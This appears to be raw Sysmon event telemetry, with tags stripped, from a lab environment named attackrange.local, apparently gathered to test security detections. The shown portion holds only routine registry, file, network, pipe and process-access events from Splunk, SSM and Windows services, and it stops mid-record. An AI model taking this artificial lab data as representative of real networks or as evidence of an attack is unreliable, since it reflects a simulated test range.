Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97E25FA9D5EAA0BE5A06F62581583A7F,SHA256=32BC639C1718895F01B50C8FF176C79B8E2E661D62E8B3CDD057C0F0BEA909B6,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000083318Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 08:01:20.578{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000083317Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 08:01:20.578{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0020b28b) 13241300x800000000000000083316Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 08:01:20.578{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b8ed-0xa2482610) 13241300x800000000000000083315Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 08:01:20.578{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b8f6-0x040c8e10) 13241300x800000000000000083314Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 08:01:20.578{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b8fe-0x65d0f610) 13241300x800000000000000083313Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 08:01:20.578{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000083312Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 08:01:20.578{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0020b28b) 13241300x800000000000000083311Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 08:01:20.578{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b8ed-0xa2482610) 13241300x800000000000000083310Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 08:01:20.578{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b8f6-0x040c8e10) 13241300x800000000000000083309Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 08:01:20.578{2FDD8D40-AC99-615A-0B00-00000000FD01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b8fe-0x65d0f610) 23542300x800000000000000083308Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:20.312{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2543869031CB6457C488AEB6C8077CF1,SHA256=25D0B6DDAC73CAA7A4C718E130A5FED7EF938320B09068BBF0CF078F946526F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107311Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:21.850{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F16C29CF9D8C6740F35F8812BBAE2F8,SHA256=663320C0CD759EA7B3A69124E695259E88287808DCAA1F1A6D681680B9C46E52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083319Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:21.312{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F610055414030D9B0A0120B92205CB9,SHA256=232011C799A3C9EDDB84C1A72A7D18070D8FC944D57E74D8ADAE354C925470FA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107310Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:20.340{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51878-false10.0.1.12-8000- 23542300x8000000000000000107313Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:22.865{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0F9A67E3B66D64F26437FF86AC33347,SHA256=0111614A5D87D3A4995610CBEF83F5C43F4AA12520C9CC43AAC204DA4E814760,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083320Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:22.320{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F333649724FAD495DFF43AE28EBB797,SHA256=7D80227EB4E7FFE5E83687D5BE74EEBC30366DC641114297AEC2331088BE6D18,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107312Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:22.449{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000107314Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:23.867{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F81A707221A7BD89DCED13609D98337B,SHA256=F5ABA5E1E6052391899D4EF7F4654771A34FF19257199C034B7BF36B4513AF51,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083330Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:21.467{2FDD8D40-AC9C-615A-3A00-00000000FD01}2840C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50163-false169.254.169.254-80http 354300x800000000000000083329Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:21.390{2FDD8D40-AC9C-615A-3A00-00000000FD01}2840C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50162-false169.254.169.254-80http 354300x800000000000000083328Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:21.331{2FDD8D40-AC9C-615A-3A00-00000000FD01}2840C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50161-false169.254.169.254-80http 354300x800000000000000083327Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:21.331{2FDD8D40-AC9C-615A-3A00-00000000FD01}2840C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50160-false169.254.169.254-80http 354300x800000000000000083326Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:21.225{2FDD8D40-AC9C-615A-3A00-00000000FD01}2840C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50159-false169.254.169.254-80http 354300x800000000000000083325Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:21.167{2FDD8D40-AC9C-615A-3A00-00000000FD01}2840C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50158-false169.254.169.254-80http 354300x800000000000000083324Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:21.166{2FDD8D40-AC9C-615A-3A00-00000000FD01}2840C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50157-false169.254.169.254-80http 354300x800000000000000083323Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:21.165{2FDD8D40-AC9C-615A-3A00-00000000FD01}2840C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50156-false169.254.169.254-80http 354300x800000000000000083322Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:20.586{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50155-false10.0.1.12-8000- 23542300x800000000000000083321Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:23.320{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1707E9ED54CBEEC301D61BFA28505321,SHA256=0F91663D0B090D21EFC9015F104CAF34E43E04476323729F8FABED7B077A914D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107315Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:24.871{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09C7EF9601FE3BC54D56AC2BD34B9BF2,SHA256=D851B9080AE943A0435DBA57E11FCF9EB96E1A234708EE719BA17FA205ACEE2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083331Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:24.320{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DAFF9A390A3455E68886B0B345CBE57,SHA256=ABE222FDCCA7687C0D9FF74227AFCD1CAB64789FFCECA7E272862EA2B21F713A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107317Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:25.901{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=790CA5698EA6A0625FBBC304E0BF15AD,SHA256=CA53EC55B9E5D29D223E2F7A94A5B8A7761A38799F5D2D9A92D998E816E9ADCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083332Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:25.320{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2408E0AF4DC6D0962BA31FB1E0838416,SHA256=FB38AE7CBFB710C4ED4932A8B3AE4369E1C878FEE840C8CE213D8FB619798912,IMPHASH=00000000000000000000000000000000falsetrue 17141700x8000000000000000107316Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 08:01:25.686{58E9C193-AE68-615A-C800-00000000FC01}4548\UIA_PIPE_4548_000003cfC:\Windows\Explorer.EXE 23542300x8000000000000000107318Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:26.918{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D488AFA90201BE44D6FABAEF727B3615,SHA256=48CD046246E7D4361015D197DD10E4A9B6D0E4FAB190098328FD2E578358E740,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083333Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:26.320{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=757221051B6C1E278955D9AA644DEAB0,SHA256=DBB6F4F5457722A542E191E6A1C2A5464CF0DFE083745CF3FA8D2D4AFE6A2737,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107320Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:27.936{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=939B2784EAB5A82C8725C75B993EA185,SHA256=C19D389FA471D1CF85C5FE57F00BC86622231FE426459D436D49E6F4EB13EB6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083334Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:27.320{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D43DC7BF66C25C58F3AE28E48C337A9,SHA256=6D19A2E0341D0D1F7E6D378EF9693BFABB7285978CB38AA20D85511D3581DFDC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107319Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:25.428{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51879-false10.0.1.12-8000- 23542300x8000000000000000107321Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:28.951{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5EE0974D21F99D6AD767588479D83DC,SHA256=7600AF81972CDD4743C2ADF358C83D99E850537492E4EBFB8894B3B75FE65144,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083335Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:28.320{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8205D0875013D6A854C22447C7A3EFBE,SHA256=9C36B660EC8C5FC992B6E4AF1FCCF69F992D03AF0D044BF073329C425D07B003,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107322Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:29.982{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=065E21D66942EBBEF7D33A1464477BAD,SHA256=AB29448661EA1E4137FFD0D91B06ABB9F987B6F0FFCF4DB7A3F5AE402CE6BFD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083338Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:29.867{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083337Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:26.609{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50164-false10.0.1.12-8000- 23542300x800000000000000083336Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:29.335{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4F3DE65A524822F9E966C0BC3AE4EB6,SHA256=708DE657A9405906A5393AEED8AD6F8AED4BDFA4F4C8C1B0509859200562CA53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107323Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:30.996{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A4691BC2A52916E9C84D20A711BECF4,SHA256=CE11A11BFC50B50962481D9E6FA857D8804FCD8BE04393202A0AB971C6464598,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083339Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:30.382{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B333658B01E4A7431ACFCD27E58D728E,SHA256=CF1C4992565A1C30433591AD587BDCE2FA23CA439570E3D42E5AB11B02D11BD3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083367Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.898{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B4DB-615A-9001-00000000FD01}2748C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083366Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.898{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083365Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.898{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083364Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.898{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083363Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.898{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083362Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.898{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083361Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 